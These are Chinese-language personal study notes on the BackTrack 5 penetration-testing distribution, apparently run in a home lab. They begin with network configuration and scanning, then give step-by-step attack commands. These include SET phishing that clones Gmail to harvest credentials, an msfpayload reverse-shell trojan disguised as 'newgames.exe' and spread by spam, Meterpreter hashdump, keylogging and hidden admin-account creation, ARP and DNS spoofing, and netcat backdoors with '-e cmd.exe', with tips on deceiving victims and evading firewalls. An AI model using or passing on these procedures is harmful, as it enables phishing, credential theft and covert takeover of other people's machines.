1.BT5默认用户名:root.密码:toor(公司是yeslabccies)
2.进入图形化界面命令:startx
3.更改密码:sudo passwd root
扫描工具
第一部分网络配置:
4.网络配置文件有两个:
/etc/network/interfaces 和 /etc/resolv.conf
前一个存放网卡接口、IP、子网掩码等,后一个主要是存放DNS。
5.查看IP信息:ifconfig
6.更改IP :ifconfig eth2 192.168.8.168 netmask 255.255.255.0
注意:我更改IP后无法上网,这时候改回IP也上不了,这时候应该用第12和11的命令,初始化网卡。
7.添加网关: route add default gw 192.168.8.1
8.查看默认路由:route –n
9.显示内核IP路由表:netstat –r(更多命令查看netstat -h)
10.为临时网络配置信息加DNS设置可以修改/etc/resolv.conf:
Nameserver 8.8.8.8(google的一个DNS服务器)
11.清空一个网卡接口的所有IP配置信息:
Ip addr flush eth0
12.启用网卡:sudo ifup eth0
13.关闭网卡:sudo ifdown eth0
14.动态IP地址分配(DHCP Client)修改/etc/network/interfaces文件如下:
1 |
auto eth0 |
通过以上配置网卡后,你可以手动运行ifup命令来启用该网卡,该命令会通过dhclient来初始化DHCP进程。
1 |
sudo ifup eth0 |
要手动禁用某网卡,可以使用 ifdown 命令,它将启动DHCP释放进程然后关闭网卡接口。
1 |
sudo ifdown eth0 |
15.静态IP地址分配
同样是修改/etc/network/interfaces文件内容:
1 |
auto eth0 netmask 255.255.255.0 |
16.静态主机名
修改/etc/hosts文件内容:
下面是一个例子:
从左到右分别是IP 简洁的主机名别名相应的 FQDN ( Fully Qualified Domain Names )
127.0.0.1 localhost
第二部分主机发现:
1. 使用arping判断局域网相邻主机是否存活:
arping –c 3 192.168.8.155(-c次数)
2. 使用fping快速:
fping –f ip.txt (ip.txt每一行存一IP)
fping –s –r l –g 192.168.8.1 192.168.8.255 (扫描两个IP之间的所有IP)
3. genlist获取使用清单,通过ping探针的响应
genlist –s 192.168.1.\* (扫描整个网段的存活主机)
4. hping3,可以分割发送包
hping3 –c 2 192.168.8.8
5. nbtscan扫描WINDOWS网络显示IP,主机名,用户名称和MAC地址等等
nbtscan –r 192.168.8.1/24 (扫描整个网段)
nbtscan 192.168.8.1-255 (同上)
6. nping支持tcp,udp,icmp等
nping -c 1 --tcp -p 80 --flags syn 192.168.8.34
nping -c 1 --udp -p 80 192.168.8.34
7. onesixtyone,用于找出SNMP Community字串
./onesixtyone -c dict.txt 192.168.8.34
8.protos主要用来扫描特定主机上所支持的协议:
/pentest/enumeration/irpas#./protos -i eth1 -d 10.1.1.2 –v
-v 显示结果的意思
第三部分操作系统指纹:
1. p0f
2. xprobe2
xprobe2 192.168.8.34
第四部分端口扫描:
1. AutoScan
图形化网络扫描工具,能够发现网络中的活动主机
2. Netifera
可实现网络探测和抓包功能(局域网抓包)
3. Nmap
主机发现 nmap -v -n -sP 192.168.8.0/24
系统查询nmap -v -n -A 192.168.8.34
-v
把整个扫描结果显示出来
-n 不做DNS解析
-sP 列出当前网络那些主机在线
-A 综合扫描,使操作系统检测,版本检测、脚本扫描
第五部分服务探测
1. amap 指明端口探测
amap –bq 192.168.8.34 80
2. httprint指纹识别
./httprint -h 192.168.8.34 -s signatures.txt
漏洞发现
第一部分Cisco工具
1. CAT安全审计工具,扫描Cissco路由器的一般性漏洞
./CAT -h 192.168.8.254 -w lists/community -a lists/passwords
2. Cisco Passwd Scanner, 用于发现拥有默认telnet密码“Cisco”的Cisco设备
./ciscos 192.168.8.1 3 -t 4 -C 10
第二部SNM扫描工具
1. ADMSnmp, ADMSnmp用于暴力PJSNMP community字串,使用预先定义的“wordlist”
./ADMsnmp 192.168.8.34 -wordf snmp.passwd
2. Snmp Enum在获得community后,可以使用snmp enum获取大量关于Cisco,windows和linux的信息
./snmpenum.pl 192.168.8.34 private cisco.txt
第三部分HTTP工具
1. Burp Suite分析和攻击web运用
java -jar burpsuite_v1.4.jar
Proxy 代理端口可以编辑 intruder 选项卡选择intruder on 即开启代理端口为8080 更改浏览器的连接设置就可用此代理
2. Grendel Scan 网页漏洞扫描工具
/pentest/web/grendel-scan# ./grendel.sh
3. Nikto2 安全漏洞扫描工具
/pentest/web/nikto# ./nikto.pl -h jw.nwpu.edu.cn -C -p 80 -T 3478b -t 3 -D \ V -o webtest -F htm
其中 webtest里存放的扫描结果
4. w3af 特性丰富的web运用攻击和审计的框架,他协助检测和攻击
/pentest/web/w3af# ./w3af_console
参数配置
w3af>>>plugins(插件设置)
w3af/plugins>>>help
w3af/plugins>>>output console,htmlFile(插件输出设置)
w3af/plugins>>>output config htmlFile(插件文件格式设置)
w3af/plugins/output/config:htmlFile>>>set verbose True(冗余模式打开)
w3af/plugins/output/config:htmlFile>>>set fileName testreport.html(输出文件名)
w3af/plugins/output/config:htmlFile>>>back
w3af/plugins>>>output config console(插件模块设置)
w3af/plugins/output/config:console>>>set verbose False
w3af/plugins/output/config:console>>>back
w3af/plugins>>>audit htaccessMethods , osCommanding , sqli , xss(加载各种脚本)
w3af/plugins>>>back
w3af>>>target(目标地址设置)
w3af/config:target>>>set target http://xx.xx.xx.xx/
w3af/config:target>>>back
w3af>>>start(开始攻击)
5. WAFW00F 探测WAF(运用层防火墙)的工具,会返回在这个之前有什么运用级防火墙是哪个厂商的
/pentest/web/waffit# ./wafw00f.py http://www.baidu.com
6. Samrdump
/pentest/python/impacket-examples# ./samrdump.py administrator:cisco@192.168.8.254 445/SMB
第五部分综合漏洞发现工具Nessus
开启服务
/etc/init.d/nessusd start
打开https://localhost:8834/
用户名:cisco 密码:cisco
社会工程学工具SET
第一部分:Java Applet Attack Method(利用java的病毒攻击)
第二部分:Credential Harvester Attack Method(收集个人信息)
1. SET是一个高级的,多功能的,并且易于使用的计算机社会工程学工具集
/pentest/exploits/set/config# vi set_config (查看配置信息)
METASPLOIT_PATH=/pentest/exploits/framework3(MSF漏洞利用攻击工具路径)
ETTERCAP=ON(一个网络欺骗工具功能是否开放)
ETTERCAP_PATH=/usr/share/ettercap
ETTERCAP_DNSIFF_INTERFACE=eth1(使用DNS欺骗的网络接口)
EMAIL_PROVIDER=GMAIL(发送垃圾邮件的提供商)
SELF_SIGNED_APPLET=ON(自签名插件)
JAVA_ID_PARAM=Secure
Java Applet(签名时候是哪个厂商产生的,后面这个名字写的靠谱点,让人相信会去点击)
命令
/pentest/exploits/set# ./set
然后set> 1
set> 2
set:webattack>1
set:webattack>2
set:payloads>2
set:encoding>16
set:phishing>1
set:phishing> Your gmail email address: :pythonisfun@gmail.com
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
set:phishing> Email subject:Thank you! For your application.
set:phishing> Send the message as html or plain? ‘h‘ or ‘p‘ [p]:
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:welcome to our sites:http://192.168.8.167
Next line of the body: ^C
以上做的是克隆百度的站点,通过自己的Gmail发送邮件给被攻击者,只要他人点击http://192.168.8.167,并加载运行那个java插件secure java applet就会中招。(在WIN7和2003上点击链接,并没有弹出secure java applet插件,也许是浏览器的安全设置弄的)
如果有人中招,按Ctrl+C终止。
msf exploit(handler) > sessions –i (查看中招的主机信息)
命令/pentest/exploits/set# ./set
然后set> 1
set> 2
set:webattack>3
set:webattack>2
set:mailer>1
Enter the url to clone:https://gmail.com
1--->发送给单一目标
Send Email To:1392688486@qq.com
1-->用gmail发送邮件攻击
Your Gmail email address:xxxxx@gmail.com
Email password:xxxxx
Flag this message/s as high priority?[yes|no]yes(是不是高优先标签)
Email subject:(Email的标题,考你的语文水平,欺骗他让他点你的站点)
Send the message as htmal or plain? ‘h‘ or ‘p‘ [p]:(发送文件是以什么格式)
Enter the body of the message, hit return for a new line,Control+c when finished:(编写邮件的内容按Ctrl+C来结束)
这个只要他人点击你给的链接(最好自己有一个域名),输入用户名和密码,我们就可以知道了
应用层攻击MSF
1. 启动msfconsole 命令:msfconsole
msf>hosts (查看扫描过的主机数据库)
msf>host –d (删除这个数据库里的内容 hosts –h可以知道hosts所有用法)
msf>services (存放扫描主机开启的服务的数据库)
msf>nmap –T Aggressive –sV –n –O –v 192.168.8.1/24 (扫描这个网段)
msf>load db_autopwn (没有db_autopwn这个模块,必须先下载,然后用命令cp db_autopwn.rb /opt/framework3/msf3/plugins/ 拷贝到此处,每次使用这个模块之前load db_autopwn)
msf>db_autopwn –p –t –e (从扫描的结果中自动攻击,-I后接指定IP)
msf>sessions –i (查看攻破的主机)
msf>session –i 1 (主机ID 1,连到这个主机)
meterpreter>run hashdump (获取账号hash值)
meterpreter>ps (查看控制主机的所有进程)
meterpreter>migrate 1576 (迁移到1576进程ID,获得管理员权限)
meterpreter>keyscan_start (监视主机键盘记录)
meterpreter>keyscan_dump (显示键盘记录)
meterpreter>keyscan_stop (停止)
meterpreter>run getgui –e (开启被控制主机的远程登录服务)
meterpreter>run getgui –u cisco –p cisco (向远程主机添加拥有管理员权限的账号:cisco 密码:cisco )
然后开启远程登录软件:rdesktop 192.168.8.34:3389(被控制主机IP,port),输入账号:cisco 密码:cisco
破解刚才获取的hash值得到管理员密码:
/pentest/passwords# ophcrack –g –d ~/tables_xp_free_small –t ~/tables_xp_free_small/ -f ~/sam-new-test.
其中tables_xp_free_small是字典,sam-new-test是刚才得到的hash值
离线攻击MSF
1. 制造离线攻击脚本
先创建一个反向连接TCP客户端(相当于木马),然后把这个.exe文件通过垃圾邮件发送给别人。/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.167 LPORT=33333 X > /tmp/newgames.exe (newgames.exe就是一个木马)
然后打开msfconsole. root@bt:~# msfconsole
建立服务器:msf > use exploit/multi/handler
建立负载,反向TCP:msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
设置服务器(我的就是自己的IP,和上面对应):msf exploit(handler) > set LHOST 192.168.8.167
设置端口(和上面对应):msf exploit(handler) > set LPORT 33333
服务器设置好之后,此时如果他人点击newgames.exe,就会自动连接我的服务器192.168.8.167。
接下来是得到进程列表,迁移到管理员权限,然后开启别人主机的远程登录服务
meterpreter > getuid
Server username: xyw-PC\xyw
meterpreter > ps
meterpreter > run getgui -u user -p passwd (向别人主机添加有管理员权限的用户名和密码)
然后在自己主机开启远程登录服务,连接到上当的主机IP(这里是192.168.8.154,第一张图里的最后有)
这些在上一篇里都有,WIN7可能连接不上,请关闭防火墙,反正192.168.8.154(WIN7系统)的远程登录服务已经开启了,并且它多了一个拥有管理员权限的用户user。
局域网攻击
1. MAC泛洪攻击
百科一下:MAC地址泛洪攻击:
1,2层交换机是基于MAC地址去转发数据帧的。
2,转发过程中依靠对CAM表的查询来确定正确的转发接口。
3,一旦在查询过程中无法找到相关目的MAC对应的条目,此数据帧将作为广播帧来处理。
4,CAM表的容量有限,只能储存不多的条目,当CAM表记录的MAC地址达到上限后,新的条目将不会添加到CAM表中。
ARP攻击:
比如别人限制您的网速,就称之为ARP攻击,就是针对你的IP地址进行控制。
DHCP欺骗:
1.DHCP是动态主机配置协议,主要用来让PC机自动获IP地址,子网掩码,默认网关等信息。
2.DHCP的发包方式为广播。
3.当有多个DHCP的回应时,使用最先到达的回应。
工具macof,命令:macof –i eth2 (通过eth2泛洪)
Dsniff抓包工具(获取敏感信息,用户名和密码)命令:dsniff –i eth2
2. Yersinia 图形化局域网攻击工具。
启动命令:root@bt:~# yersinia –G
3. Arpspoof
arp欺骗就是自己对要截获数据包的主机(如192.167.8.154)声称自己就是网关的地址(一般是网关地址,因为局域网内每个人都要通过网关发送或接收数据),然后在对网关(192.168.8.254)声称自己就是192.167.8.154,这样192.167.8.1544与192.168.8.254
之间通信的数据包每次都经过你,你就可以用抓包工具wireshark截获192.167.8.34的信息。
root@bt:~# arpspoof -i eth2 -t 192.168.8.154 192.168.8.254 (欺骗主机)
root@bt:~# arpspoof -i eth2 -t 192.168.8.254 192.168.8.154 (欺骗网关)
4. Ettercap图形化界面
启动命令:root@bt:~# ettercap -G
4.1 ARP欺骗
先点击Hosts>Scan for hosts,然后点击Hosts list得到局域网内存活的主机。
选中两个要进行arp欺骗的IP,一般是网关和一主机。
然后开启sniff,得到敏感信息(用户名和密码)。
这是百度用户名和密码,密码是加密了的。
4.2 DNS欺骗
和上面步骤差不多,dns欺骗模块在plugins里,点击plugins双击dns spoof
维持访问
1. DNS隧道技术
2. Ping隧道技术
3. SSL隧道技术
三个IP,一个是路由器IP 192.168.8.254,两个BT5 主机IP,192.168.8.167和192.168.8.176,其中192.168.8.167作为stunnel服务器,192.168.8.176作为客户端,只要连接到192.168.8.176的2323端口就会转到192.168.8.167的端口,只要连接到192.168.8.167的2323端口就会转到192.168.8.254,具体配置如下:
遇到的问题:复制一个BT5之后打开这个新的BT5不能上网,这是因为把原先的mac地址保存在缓存中,所以导致怎么重启网卡(sudo /etc/init.d/networking restart)都是不能启用。应该:
rm /etc/udev/rules.d/70-persistent-net.rules 后重启就行
服务器端配置文件:root@bt:~# cd /etc/stunnel/
vi stunnel.conf
创建临时文件夹 mkdir /var/run/stunnel
将connect 后的IP地址改成要访问的IP,(一般是网关)
启动stunnel. root@bt:~# stunnel /etc/stunnel/stunnel.conf
查看stunnel运行状态 netstat –nap|grep stunnel
客户端配置文件:
创建临时文件夹 mkdir /var/run/stunne
大多数步骤相同,除了把connect 后的IP地址改成上面服务器的IP,端口为232(connect=ip:2323),启动stunnel. root@bt:~# stunnel /etc/stunnel/stunnel.conf。可以在客户端上试一试:telnet 127.0.0.1 2323 (这会跳两次,而且通信加密连到网关)
3.proxy代理技术
4. Netcat
proxy代理技术
查看3proxy配置文件
代理主机IP:192.168.8.159 web服务器IP:192.168.8.167
root@bt:~# vi /pentest/backdoors/3proxy/cfg/3proxy.cfg
External(在局域网内外部接口这里用不到),internal(改成web服务器的IP,前提是你要在web服务器主机上(不是自己)配置好自己的web服务器,详见http://www.jb51.net/os/Ubuntu/43308.html)
然后启动3proxy:
root@bt:/pentest/backdoors/3proxy# ./3proxy cfg/3proxy.cfg
现在可以在其他主机上访问http://192.168.8.159/info.php他会自动转到http://192.168.8.167/info.php 和直接访问http://192.168.8.167/info.php的效果一样
注意http://192.168.8.159/info.php实际上不存在
Netcat
网络的瑞士军刀,功能强大,做后门的效果比较好
1.扫描主机端口是否开放
root@bt:~# nc -v -n -z 192.168.8.159 1-1024
连接到21端口开放的主机
root@bt:~# nc 192.168.8.159 21
2.做后门
2.1 受害者做服务器,当攻击者连接受害者的时候,受害者把自己的cmd.exe给攻击者,这种方法因为是攻击者连接受害者可能会遇到防火墙的封杀。
在WIN7下用nc做服务器的命令:C:\Users\xyw\Desktop>nc.exe -d -L -p 3333 -e cmd.exe (注意:我在网上下的一个nc.exe,放在桌面上,端口是3333)
然后再BT5下连接WIN7的ip加3333端口:root@bt:~# nc 192.168.8.151 3333,得到WIN7的cmd.exe控制权。
2.2 攻击者做服务器,等待受害者来连接,可以有效避免防火墙的拦截。
BT5做服务器:root@bt:~# nc -L -p 3333
WIN7做客户端:nc.exe –d 192.168.8.167 3333 –e cmd.exe
2.3 用来传文件
现在BT5下面root@bt:~# nc -l -u -p 53 > test.py,用udp 53(dns协议用的端口)端口来传文件可以防止防火墙封杀,把收到的文件命名为test.py(随便命名)。
在WIN7下:C:\Users\xyw\Desktop>nc.exe -u 192.168.8.167 53 < npu.py
(192.168.8.167 BT5 IP,192.168.8.151 WIN7 IP)
2.nc做中继站,和代理服务器差不多,当你连接中继的时候转到指定的IP,nc可以抓包
查看和修改配置文件root@bt:~# vi telnet_relay ( 主要修改IP,要跳到的IP)
启动:root@bt:~# nc -l -p 80 -e telnet_relay
然后其他主机:telnet IP(中继站IP)时跳转到指定IP。
Back Track5学习笔记,布布扣,bubuko.com
原文地址:http://www.cnblogs.com/daban/p/3761329.html